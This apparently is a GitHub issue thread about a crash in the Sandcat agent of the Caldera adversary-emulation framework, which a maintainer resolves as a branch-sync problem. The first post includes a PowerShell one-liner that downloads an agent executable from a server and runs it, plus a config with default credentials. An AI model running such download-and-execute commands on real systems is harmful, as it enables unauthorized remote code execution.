### ISSUE TITLE
Sandcat: "panic: interface conversion: interface {} is nil, not string"

### ISSUE THREAD

**Issue by punchdrunktux** [mitre/caldera#664]
Appears to be a bug in the current master repo.  Running sandcat on a newly cloned repo:

> PS C:\windows\system32> $url="http://10.10.10.70:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://10.10.10.70:8888 -group my_group;
> panic: interface conversion: interface {} is nil, not string
> 
> goroutine 1 [running]:
> _/opt/caldera/plugins/sandcat/gocat/contact.API.GetInstructions(0xc00005cbd0, 0x6)
>         /opt/caldera/plugins/sandcat/gocat/contact/api.go:48 +0x465
> main.runAgent(0x6f5720, 0x8bb428, 0xc00005cbd0)
>         /opt/caldera/plugins/sandcat/gocat/sandcat.go:33 +0x68
> main.main()
>         /opt/caldera/plugins/sandcat/gocat/sandcat.go:107 +0x4e4
> PS C:\windows\system32>
> 

**Config:** 

host: 10.10.10.70
port: 8888
exfil_dir: /tmp
memory: True
untrusted_timer: 180
plugins:
  - stockpile
  - sandcat
  - gui
  - chain
debug: False
api_key: ADMIN123
users:
  admin: admin
root@caldera:/opt/caldera#

**Comment by privateducky** [comment]
This looks like plugins out of sync. If you’re using bleeding-edge code (master branch) this can happen easily. You should do a fresh clone, which tends to be easier than updating each plugin independently.

**Comment by privateducky** [comment]
ha- I take that back- it was US who didn't have our master branch correctly aligned with the plugins. I just fixed that, so master should be back to normal now. we had just added a new feature to the agent, which tracks the privilege-level of the agent while running. thanks!

**Comment by privateducky** [comment]
one extra note-- depending on your browser, since we made a JavaScript change as part of this, you may need to clear your browser cache for this to take effect (just in case you notice any browser errors)

**Comment by punchdrunktux** [comment]
Much appreciated.
